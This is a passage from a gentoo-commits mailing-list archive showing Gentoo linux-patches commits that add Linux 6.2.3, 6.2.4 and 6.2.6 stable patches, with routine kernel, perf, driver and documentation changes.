++++ b/scripts/clang-tools/run-clang-tools.py
+@@ -61,14 +61,21 @@ def run_analysis(entry):
+ 
+ 
+ def main():
+-    args = parse_arguments()
++    try:
++        args = parse_arguments()
+ 
+-    lock = multiprocessing.Lock()
+-    pool = multiprocessing.Pool(initializer=init, initargs=(lock, args))
+-    # Read JSON data into the datastore variable
+-    with open(args.path, "r") as f:
+-        datastore = json.load(f)
+-        pool.map(run_analysis, datastore)
++        lock = multiprocessing.Lock()
++        pool = multiprocessing.Pool(initializer=init, initargs=(lock, args))
++        # Read JSON data into the datastore variable
++        with open(args.path, "r") as f:
++            datastore = json.load(f)
++            pool.map(run_analysis, datastore)
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
+ 
+ 
+ if __name__ == "__main__":
+diff --git a/scripts/diffconfig b/scripts/diffconfig
+index d5da5fa05d1d3..43f0f3d273ae7 100755
+--- a/scripts/diffconfig
++++ b/scripts/diffconfig
+@@ -65,7 +65,7 @@ def print_config(op, config, value, new_value):
+         else:
+             print(" %s %s -> %s" % (config, value, new_value))
+ 
+-def main():
++def show_diff():
+     global merge_style
+ 
+     # parse command line args
+@@ -129,4 +129,16 @@ def main():
+     for config in new:
+         print_config("+", config, None, b[config])
+ 
+-main()
++def main():
++    try:
++        show_diff()
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
++
++
++if __name__ == '__main__':
++    main()
+diff --git a/tools/perf/builtin-inject.c b/tools/perf/builtin-inject.c
+index f8182417b7341..10bb1d494258d 100644
+--- a/tools/perf/builtin-inject.c
++++ b/tools/perf/builtin-inject.c
+@@ -538,6 +538,7 @@ static int perf_event__repipe_buildid_mmap2(struct perf_tool *tool,
+ 			dso->hit = 1;
+ 		}
+ 		dso__put(dso);
++		perf_event__repipe(tool, event, sample, machine);
+ 		return 0;
+ 	}
+ 
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index 9f3e4b2575165..387dc9c9e7bee 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -539,12 +539,7 @@ static int enable_counters(void)
+ 			return err;
+ 	}
+ 
+-	/*
+-	 * We need to enable counters only if:
+-	 * - we don't have tracee (attaching to task or cpu)
+-	 * - we have initial delay configured
+-	 */
+-	if (!target__none(&target)) {
++	if (!target__enable_on_exec(&target)) {
+ 		if (!all_counters_use_bpf)
+ 			evlist__enable(evsel_list);
+ 	}
+@@ -914,7 +909,7 @@ try_again_reset:
+ 			return err;
+ 	}
+ 
+-	if (stat_config.initial_delay) {
++	if (target.initial_delay) {
+ 		pr_info(EVLIST_DISABLED_MSG);
+ 	} else {
+ 		err = enable_counters();
+@@ -926,8 +921,8 @@ try_again_reset:
+ 	if (forks)
+ 		evlist__start_workload(evsel_list);
+ 
+-	if (stat_config.initial_delay > 0) {
+-		usleep(stat_config.initial_delay * USEC_PER_MSEC);
++	if (target.initial_delay > 0) {
++		usleep(target.initial_delay * USEC_PER_MSEC);
+ 		err = enable_counters();
+ 		if (err)
+ 			return -1;
+@@ -1248,7 +1243,7 @@ static struct option stat_options[] = {
+ 		     "aggregate counts per thread", AGGR_THREAD),
+ 	OPT_SET_UINT(0, "per-node", &stat_config.aggr_mode,
+ 		     "aggregate counts per numa node", AGGR_NODE),
+-	OPT_INTEGER('D', "delay", &stat_config.initial_delay,
++	OPT_INTEGER('D', "delay", &target.initial_delay,
+ 		    "ms to wait before starting measurement after program start (-1: start with events disabled)"),
+ 	OPT_CALLBACK_NOOPT(0, "metric-only", &stat_config.metric_only, NULL,
+ 			"Only print computed metrics. No raw values", enable_metric_only),
+diff --git a/tools/perf/util/stat.c b/tools/perf/util/stat.c
+index 534d36d26fc38..a07473703c6dd 100644
+--- a/tools/perf/util/stat.c
++++ b/tools/perf/util/stat.c
+@@ -842,11 +842,7 @@ int create_perf_stat_counter(struct evsel *evsel,
+ 	if (evsel__is_group_leader(evsel)) {
+ 		attr->disabled = 1;
+ 
+-		/*
+-		 * In case of initial_delay we enable tracee
+-		 * events manually.
+-		 */
+-		if (target__none(target) && !config->initial_delay)
++		if (target__enable_on_exec(target))
+ 			attr->enable_on_exec = 1;
+ 	}
+ 
+diff --git a/tools/perf/util/stat.h b/tools/perf/util/stat.h
+index 499c3bf813336..eb8cf33c3ba55 100644
+--- a/tools/perf/util/stat.h
++++ b/tools/perf/util/stat.h
+@@ -166,7 +166,6 @@ struct perf_stat_config {
+ 	FILE			*output;
+ 	unsigned int		 interval;
+ 	unsigned int		 timeout;
+-	int			 initial_delay;
+ 	unsigned int		 unit_width;
+ 	unsigned int		 metric_only_len;
+ 	int			 times;
+diff --git a/tools/perf/util/target.h b/tools/perf/util/target.h
+index daec6cba500d4..880f1af7f6ad6 100644
+--- a/tools/perf/util/target.h
++++ b/tools/perf/util/target.h
+@@ -18,6 +18,7 @@ struct target {
+ 	bool	     per_thread;
+ 	bool	     use_bpf;
+ 	bool	     hybrid;
++	int	     initial_delay;
+ 	const char   *attr_map;
+ };
+ 
+@@ -72,6 +73,17 @@ static inline bool target__none(struct target *target)
+ 	return !target__has_task(target) && !target__has_cpu(target);
+ }
+ 
++static inline bool target__enable_on_exec(struct target *target)
++{
++	/*
++	 * Normally enable_on_exec should be set if:
++	 *  1) The tracee process is forked (not attaching to existed task or cpu).
++	 *  2) And initial_delay is not configured.
++	 * Otherwise, we enable tracee events manually.
++	 */
++	return target__none(target) && !target->initial_delay;
++}
++
+ static inline bool target__has_per_thread(struct target *target)
+ {
+ 	return target->system_wide && target->per_thread;
+diff --git a/tools/testing/selftests/netfilter/nft_nat.sh b/tools/testing/selftests/netfilter/nft_nat.sh
+index 924ecb3f1f737..dd40d9f6f2599 100755
+--- a/tools/testing/selftests/netfilter/nft_nat.sh
++++ b/tools/testing/selftests/netfilter/nft_nat.sh
+@@ -404,6 +404,8 @@ EOF
+ 	echo SERVER-$family | ip netns exec "$ns1" timeout 5 socat -u STDIN TCP-LISTEN:2000 &
+ 	sc_s=$!
+ 
++	sleep 1
++
+ 	result=$(ip netns exec "$ns0" timeout 1 socat TCP:$daddr:2000 STDOUT)
+ 
+ 	if [ "$result" = "SERVER-inet" ];then


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-13 11:30 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-03-13 11:30 UTC (permalink / raw
  To: gentoo-commits

commit:     3aab80d7924f05c8026412b65c7fe17c5e1117a8
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Mon Mar 13 10:45:10 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Mon Mar 13 10:45:10 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3aab80d7

Linux patch 6.2.6

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |   4 +
 1005_linux-6.2.6.patch | 262 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 266 insertions(+)

diff --git a/0000_README b/0000_README
index 2cb9b328..d40230d0 100644
--- a/0000_README
+++ b/0000_README
@@ -63,6 +63,10 @@ Patch:  1004_linux-6.2.5.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.5
 
+Patch:  1005_linux-6.2.6.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.6
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1005_linux-6.2.6.patch b/1005_linux-6.2.6.patch
new file mode 100644
index 00000000..38305711
--- /dev/null
+++ b/1005_linux-6.2.6.patch
@@ -0,0 +1,262 @@
+diff --git a/Makefile b/Makefile
+index 1a1d63f2a9edb..70e66e7716086 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 5
++SUBLEVEL = 6
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index 741d8f3e8fb3a..c467eeae99733 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -512,6 +512,63 @@ static int tpm_add_legacy_sysfs(struct tpm_chip *chip)
+ 	return 0;
+ }
+ 
++/*
++ * Some AMD fTPM versions may cause stutter
++ * https://www.amd.com/en/support/kb/faq/pa-410
++ *
++ * Fixes are available in two series of fTPM firmware:
++ * 6.x.y.z series: 6.0.18.6 +
++ * 3.x.y.z series: 3.57.y.5 +
++ */
++static bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
++{
++	u32 val1, val2;
++	u64 version;
++	int ret;
++
++	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
++		return false;
++
++	ret = tpm_request_locality(chip);
++	if (ret)
++		return false;
++
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val1, NULL);
++	if (ret)
++		goto release;
++	if (val1 != 0x414D4400U /* AMD */) {
++		ret = -ENODEV;
++		goto release;
++	}
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_1, &val1, NULL);
++	if (ret)
++		goto release;
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_2, &val2, NULL);
++
++release:
++	tpm_relinquish_locality(chip);
++
++	if (ret)
++		return false;
++
++	version = ((u64)val1 << 32) | val2;
++	if ((version >> 48) == 6) {
++		if (version >= 0x0006000000180006ULL)
++			return false;
++	} else if ((version >> 48) == 3) {
++		if (version >= 0x0003005700000005ULL)
++			return false;
++	} else {
++		return false;
++	}
++
++	dev_warn(&chip->dev,
++		 "AMD fTPM version 0x%llx causes system stutter; hwrng disabled\n",
++		 version);
++
++	return true;
++}
++
+ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+ 	struct tpm_chip *chip = container_of(rng, struct tpm_chip, hwrng);
+@@ -521,7 +578,8 @@ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ 
+ static int tpm_add_hwrng(struct tpm_chip *chip)
+ {
+-	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM) || tpm_is_firmware_upgrade(chip))
++	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM) || tpm_is_firmware_upgrade(chip) ||
++	    tpm_amd_is_rng_defective(chip))
+ 		return 0;
+ 
+ 	snprintf(chip->hwrng_name, sizeof(chip->hwrng_name),
+diff --git a/drivers/char/tpm/tpm.h b/drivers/char/tpm/tpm.h
+index 24ee4e1cc452a..830014a266090 100644
+--- a/drivers/char/tpm/tpm.h
++++ b/drivers/char/tpm/tpm.h
+@@ -150,6 +150,79 @@ enum tpm_sub_capabilities {
+ 	TPM_CAP_PROP_TIS_DURATION = 0x120,
+ };
+ 
++enum tpm2_pt_props {
++	TPM2_PT_NONE = 0x00000000,
++	TPM2_PT_GROUP = 0x00000100,
++	TPM2_PT_FIXED = TPM2_PT_GROUP * 1,
++	TPM2_PT_FAMILY_INDICATOR = TPM2_PT_FIXED + 0,
++	TPM2_PT_LEVEL = TPM2_PT_FIXED + 1,
++	TPM2_PT_REVISION = TPM2_PT_FIXED + 2,
++	TPM2_PT_DAY_OF_YEAR = TPM2_PT_FIXED + 3,
++	TPM2_PT_YEAR = TPM2_PT_FIXED + 4,
++	TPM2_PT_MANUFACTURER = TPM2_PT_FIXED + 5,
++	TPM2_PT_VENDOR_STRING_1 = TPM2_PT_FIXED + 6,
++	TPM2_PT_VENDOR_STRING_2 = TPM2_PT_FIXED + 7,
++	TPM2_PT_VENDOR_STRING_3 = TPM2_PT_FIXED + 8,
++	TPM2_PT_VENDOR_STRING_4 = TPM2_PT_FIXED + 9,
++	TPM2_PT_VENDOR_TPM_TYPE = TPM2_PT_FIXED + 10,
++	TPM2_PT_FIRMWARE_VERSION_1 = TPM2_PT_FIXED + 11,
++	TPM2_PT_FIRMWARE_VERSION_2 = TPM2_PT_FIXED + 12,
++	TPM2_PT_INPUT_BUFFER = TPM2_PT_FIXED + 13,
++	TPM2_PT_HR_TRANSIENT_MIN = TPM2_PT_FIXED + 14,
++	TPM2_PT_HR_PERSISTENT_MIN = TPM2_PT_FIXED + 15,
++	TPM2_PT_HR_LOADED_MIN = TPM2_PT_FIXED + 16,
++	TPM2_PT_ACTIVE_SESSIONS_MAX = TPM2_PT_FIXED + 17,
++	TPM2_PT_PCR_COUNT = TPM2_PT_FIXED + 18,
++	TPM2_PT_PCR_SELECT_MIN = TPM2_PT_FIXED + 19,
++	TPM2_PT_CONTEXT_GAP_MAX = TPM2_PT_FIXED + 20,
++	TPM2_PT_NV_COUNTERS_MAX = TPM2_PT_FIXED + 22,
++	TPM2_PT_NV_INDEX_MAX = TPM2_PT_FIXED + 23,
++	TPM2_PT_MEMORY = TPM2_PT_FIXED + 24,
++	TPM2_PT_CLOCK_UPDATE = TPM2_PT_FIXED + 25,
++	TPM2_PT_CONTEXT_HASH = TPM2_PT_FIXED + 26,
++	TPM2_PT_CONTEXT_SYM = TPM2_PT_FIXED + 27,
++	TPM2_PT_CONTEXT_SYM_SIZE = TPM2_PT_FIXED + 28,
++	TPM2_PT_ORDERLY_COUNT = TPM2_PT_FIXED + 29,
++	TPM2_PT_MAX_COMMAND_SIZE = TPM2_PT_FIXED + 30,
++	TPM2_PT_MAX_RESPONSE_SIZE = TPM2_PT_FIXED + 31,
++	TPM2_PT_MAX_DIGEST = TPM2_PT_FIXED + 32,
++	TPM2_PT_MAX_OBJECT_CONTEXT = TPM2_PT_FIXED + 33,
++	TPM2_PT_MAX_SESSION_CONTEXT = TPM2_PT_FIXED + 34,
++	TPM2_PT_PS_FAMILY_INDICATOR = TPM2_PT_FIXED + 35,
++	TPM2_PT_PS_LEVEL = TPM2_PT_FIXED + 36,
++	TPM2_PT_PS_REVISION = TPM2_PT_FIXED + 37,
++	TPM2_PT_PS_DAY_OF_YEAR = TPM2_PT_FIXED + 38,
++	TPM2_PT_PS_YEAR = TPM2_PT_FIXED + 39,
++	TPM2_PT_SPLIT_MAX = TPM2_PT_FIXED + 40,
++	TPM2_PT_TOTAL_COMMANDS = TPM2_PT_FIXED + 41,
++	TPM2_PT_LIBRARY_COMMANDS = TPM2_PT_FIXED + 42,
++	TPM2_PT_VENDOR_COMMANDS = TPM2_PT_FIXED + 43,
++	TPM2_PT_NV_BUFFER_MAX = TPM2_PT_FIXED + 44,
++	TPM2_PT_MODES = TPM2_PT_FIXED + 45,
++	TPM2_PT_MAX_CAP_BUFFER = TPM2_PT_FIXED + 46,
++	TPM2_PT_VAR = TPM2_PT_GROUP * 2,
++	TPM2_PT_PERMANENT = TPM2_PT_VAR + 0,
++	TPM2_PT_STARTUP_CLEAR = TPM2_PT_VAR + 1,
++	TPM2_PT_HR_NV_INDEX = TPM2_PT_VAR + 2,
++	TPM2_PT_HR_LOADED = TPM2_PT_VAR + 3,
++	TPM2_PT_HR_LOADED_AVAIL = TPM2_PT_VAR + 4,
++	TPM2_PT_HR_ACTIVE = TPM2_PT_VAR + 5,
++	TPM2_PT_HR_ACTIVE_AVAIL = TPM2_PT_VAR + 6,
++	TPM2_PT_HR_TRANSIENT_AVAIL = TPM2_PT_VAR + 7,
++	TPM2_PT_HR_PERSISTENT = TPM2_PT_VAR + 8,
++	TPM2_PT_HR_PERSISTENT_AVAIL = TPM2_PT_VAR + 9,
++	TPM2_PT_NV_COUNTERS = TPM2_PT_VAR + 10,
++	TPM2_PT_NV_COUNTERS_AVAIL = TPM2_PT_VAR + 11,
++	TPM2_PT_ALGORITHM_SET = TPM2_PT_VAR + 12,
++	TPM2_PT_LOADED_CURVES = TPM2_PT_VAR + 13,
++	TPM2_PT_LOCKOUT_COUNTER = TPM2_PT_VAR + 14,
++	TPM2_PT_MAX_AUTH_FAIL = TPM2_PT_VAR + 15,
++	TPM2_PT_LOCKOUT_INTERVAL = TPM2_PT_VAR + 16,
++	TPM2_PT_LOCKOUT_RECOVERY = TPM2_PT_VAR + 17,
++	TPM2_PT_NV_WRITE_RECOVERY = TPM2_PT_VAR + 18,
++	TPM2_PT_AUDIT_COUNTER_0 = TPM2_PT_VAR + 19,
++	TPM2_PT_AUDIT_COUNTER_1 = TPM2_PT_VAR + 20,
++};
+ 
+ /* 128 bytes is an arbitrary cap. This could be as large as TPM_BUFSIZE - 18
+  * bytes, but 128 is still a relatively large number of random bytes and
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c b/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
+index a18393c8a8339..4eb66781649ca 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
+@@ -185,7 +185,6 @@ static void _rtl92e_dm_init_fsync(struct net_device *dev);
+ static void _rtl92e_dm_deinit_fsync(struct net_device *dev);
+ 
+ static	void _rtl92e_dm_check_txrateandretrycount(struct net_device *dev);
+-static  void _rtl92e_dm_check_ac_dc_power(struct net_device *dev);
+ static void _rtl92e_dm_check_fsync(struct net_device *dev);
+ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data);
+ static void _rtl92e_dm_fsync_timer_callback(struct timer_list *t);
+@@ -238,8 +237,6 @@ void rtl92e_dm_watchdog(struct net_device *dev)
+ 	if (priv->being_init_adapter)
+ 		return;
+ 
+-	_rtl92e_dm_check_ac_dc_power(dev);
+-
+ 	_rtl92e_dm_check_txrateandretrycount(dev);
+ 	_rtl92e_dm_check_edca_turbo(dev);
+ 
+@@ -257,26 +254,6 @@ void rtl92e_dm_watchdog(struct net_device *dev)
+ 	_rtl92e_dm_cts_to_self(dev);
+ }
+ 
+-static void _rtl92e_dm_check_ac_dc_power(struct net_device *dev)
+-{
+-	struct r8192_priv *priv = rtllib_priv(dev);
+-	static const char ac_dc_script[] = "/etc/acpi/wireless-rtl-ac-dc-power.sh";
+-	char *argv[] = {(char *)ac_dc_script, DRV_NAME, NULL};
+-	static char *envp[] = {"HOME=/",
+-			"TERM=linux",
+-			"PATH=/usr/bin:/bin",
+-			 NULL};
+-
+-	if (priv->rst_progress == RESET_TYPE_SILENT)
+-		return;
+-	if (priv->rtllib->state != RTLLIB_LINKED)
+-		return;
+-	call_usermodehelper(ac_dc_script, argv, envp, UMH_WAIT_PROC);
+-
+-	return;
+-};
+-
+-
+ void rtl92e_init_adaptive_rate(struct net_device *dev)
+ {
+ 
+@@ -1662,10 +1639,6 @@ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data)
+ 	u8 tmp1byte;
+ 	enum rt_rf_power_state rf_power_state_to_set;
+ 	bool bActuallySet = false;
+-	char *argv[3];
+-	static const char RadioPowerPath[] = "/etc/acpi/events/RadioPower.sh";
+-	static char *envp[] = {"HOME=/", "TERM=linux", "PATH=/usr/bin:/bin",
+-			       NULL};
+ 
+ 	bActuallySet = false;
+ 
+@@ -1695,14 +1668,6 @@ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data)
+ 		mdelay(1000);
+ 		priv->hw_rf_off_action = 1;
+ 		rtl92e_set_rf_state(dev, rf_power_state_to_set, RF_CHANGE_BY_HW);
+-		if (priv->hw_radio_off)
+-			argv[1] = "RFOFF";
+-		else
+-			argv[1] = "RFON";
+-
+-		argv[0] = (char *)RadioPowerPath;
+-		argv[2] = NULL;
+-		call_usermodehelper(RadioPowerPath, argv, envp, UMH_WAIT_PROC);
+ 	}
+ }
+ 
+diff --git a/net/wireless/sme.c b/net/wireless/sme.c
+index 4f813e346a8bc..ce1ac01705f9b 100644
+--- a/net/wireless/sme.c
++++ b/net/wireless/sme.c
+@@ -1504,8 +1504,6 @@ int cfg80211_connect(struct cfg80211_registered_device *rdev,
+ 		connect->key = NULL;
+ 		connect->key_len = 0;
+ 		connect->key_idx = 0;
+-		connect->crypto.cipher_group = 0;
+-		connect->crypto.n_ciphers_pairwise = 0;
+ 	}
+ 
+ 	wdev->connect_keys = connkeys;


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-11 11:19 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-11 11:19 UTC (permalink / raw
  To: gentoo-commits

commit:     6b9d9c40593cd66b2df8055d546f7697b2cc8210
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Mar 11 11:18:49 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Mar 11 11:18:49 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6b9d9c40

Linux patch 6.2.4

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |   4 ++
 1003_linux-6.2.4.patch | 123 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 127 insertions(+)

diff --git a/0000_README b/0000_README
index 57b81d70..f3f521f1 100644
--- a/0000_README
+++ b/0000_README
@@ -55,6 +55,10 @@ Patch:  1002_linux-6.2.3.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.3
 
+Patch:  1003_linux-6.2.4.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.4
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1003_linux-6.2.4.patch b/1003_linux-6.2.4.patch
new file mode 100644
index 00000000..e8c12ad2
--- /dev/null
+++ b/1003_linux-6.2.4.patch
@@ -0,0 +1,123 @@
+diff --git a/Makefile b/Makefile
+index eef164b4172a9..83cbbc3adbb12 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 3
++SUBLEVEL = 4
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 45881f8c79130..9ac1efb053e08 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -118,32 +118,14 @@ static void blkg_free_workfn(struct work_struct *work)
+ {
+ 	struct blkcg_gq *blkg = container_of(work, struct blkcg_gq,
+ 					     free_work);
+-	struct request_queue *q = blkg->q;
+ 	int i;
+ 
+-	/*
+-	 * pd_free_fn() can also be called from blkcg_deactivate_policy(),
+-	 * in order to make sure pd_free_fn() is called in order, the deletion
+-	 * of the list blkg->q_node is delayed to here from blkg_destroy(), and
+-	 * blkcg_mutex is used to synchronize blkg_free_workfn() and
+-	 * blkcg_deactivate_policy().
+-	 */
+-	if (q)
+-		mutex_lock(&q->blkcg_mutex);
+-
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++)
+ 		if (blkg->pd[i])
+ 			blkcg_policy[i]->pd_free_fn(blkg->pd[i]);
+ 
+-	if (blkg->parent)
+-		blkg_put(blkg->parent);
+-
+-	if (q) {
+-		list_del_init(&blkg->q_node);
+-		mutex_unlock(&q->blkcg_mutex);
+-		blk_put_queue(q);
+-	}
+-
++	if (blkg->q)
++		blk_put_queue(blkg->q);
+ 	free_percpu(blkg->iostat_cpu);
+ 	percpu_ref_exit(&blkg->refcnt);
+ 	kfree(blkg);
+@@ -176,6 +158,8 @@ static void __blkg_release(struct rcu_head *rcu)
+ 
+ 	/* release the blkcg and parent blkg refs this blkg has been holding */
+ 	css_put(&blkg->blkcg->css);
++	if (blkg->parent)
++		blkg_put(blkg->parent);
+ 	blkg_free(blkg);
+ }
+ 
+@@ -474,14 +458,9 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	lockdep_assert_held(&blkg->q->queue_lock);
+ 	lockdep_assert_held(&blkcg->lock);
+ 
+-	/*
+-	 * blkg stays on the queue list until blkg_free_workfn(), see details in
+-	 * blkg_free_workfn(), hence this function can be called from
+-	 * blkcg_destroy_blkgs() first and again from blkg_destroy_all() before
+-	 * blkg_free_workfn().
+-	 */
+-	if (hlist_unhashed(&blkg->blkcg_node))
+-		return;
++	/* Something wrong if we are trying to remove same group twice */
++	WARN_ON_ONCE(list_empty(&blkg->q_node));
++	WARN_ON_ONCE(hlist_unhashed(&blkg->blkcg_node));
+ 
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++) {
+ 		struct blkcg_policy *pol = blkcg_policy[i];
+@@ -493,6 +472,7 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	blkg->online = false;
+ 
+ 	radix_tree_delete(&blkcg->blkg_tree, blkg->q->id);
++	list_del_init(&blkg->q_node);
+ 	hlist_del_init_rcu(&blkg->blkcg_node);
+ 
+ 	/*
+@@ -1293,7 +1273,6 @@ int blkcg_init_disk(struct gendisk *disk)
+ 	int ret;
+ 
+ 	INIT_LIST_HEAD(&q->blkg_list);
+-	mutex_init(&q->blkcg_mutex);
+ 
+ 	new_blkg = blkg_alloc(&blkcg_root, disk, GFP_KERNEL);
+ 	if (!new_blkg)
+@@ -1531,7 +1510,6 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	if (queue_is_mq(q))
+ 		blk_mq_freeze_queue(q);
+ 
+-	mutex_lock(&q->blkcg_mutex);
+ 	spin_lock_irq(&q->queue_lock);
+ 
+ 	__clear_bit(pol->plid, q->blkcg_pols);
+@@ -1550,7 +1528,6 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	}
+ 
+ 	spin_unlock_irq(&q->queue_lock);
+-	mutex_unlock(&q->blkcg_mutex);
+ 
+ 	if (queue_is_mq(q))
+ 		blk_mq_unfreeze_queue(q);
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 10ee92db680c9..43d4e073b1115 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -484,7 +484,6 @@ struct request_queue {
+ 	DECLARE_BITMAP		(blkcg_pols, BLKCG_MAX_POLS);
+ 	struct blkcg_gq		*root_blkg;
+ 	struct list_head	blkg_list;
+-	struct mutex		blkcg_mutex;
+ #endif
+ 
+ 	struct queue_limits	limits;


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-10 12:37 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-10 12:37 UTC (permalink / raw
  To: gentoo-commits

commit:     3d261b682e1bda28f3fc52ce8c45e9ab259f2b3f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 10 12:37:46 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 10 12:37:46 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3d261b68

Linux patch 6.2.3

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |     4 +
 1002_linux-6.2.3.patch | 37425 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 37429 insertions(+)

diff --git a/0000_README b/0000_README
index 49d3a418..57b81d70 100644
--- a/0000_README
+++ b/0000_README
@@ -51,6 +51,10 @@ Patch:  1001_linux-6.2.2.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.2
 
+Patch:  1002_linux-6.2.3.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.3
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1002_linux-6.2.3.patch b/1002_linux-6.2.3.patch
new file mode 100644
index 00000000..435fd26a
--- /dev/null
+++ b/1002_linux-6.2.3.patch
@@ -0,0 +1,37425 @@
+diff --git a/Documentation/admin-guide/cgroup-v1/memory.rst b/Documentation/admin-guide/cgroup-v1/memory.rst
+index 60370f2c67b99..258e45cc3b2db 100644
+--- a/Documentation/admin-guide/cgroup-v1/memory.rst
++++ b/Documentation/admin-guide/cgroup-v1/memory.rst
+@@ -86,6 +86,8 @@ Brief summary of control files.
+  memory.swappiness		     set/show swappiness parameter of vmscan
+ 				     (See sysctl's vm.swappiness)
+  memory.move_charge_at_immigrate     set/show controls of moving charges
++                                     This knob is deprecated and shouldn't be
++                                     used.
+  memory.oom_control		     set/show oom controls.
+  memory.numa_stat		     show the number of memory usage per numa
+ 				     node
+@@ -717,8 +719,15 @@ NOTE2:
+        It is recommended to set the soft limit always below the hard limit,
+        otherwise the hard limit will take precedence.
+ 
+-8. Move charges at task migration
+-=================================
++8. Move charges at task migration (DEPRECATED!)
++===============================================
++
++THIS IS DEPRECATED!
++
++It's expensive and unreliable! It's better practice to launch workload
++tasks directly from inside their target cgroup. Use dedicated workload
++cgroups to allow fine-grained policy adjustments without having to
++move physical pages between control domains.
+ 
+ Users can move charges associated with a task along with task migration, that
+ is, uncharge task's pages from the old cgroup and charge them to the new cgroup.
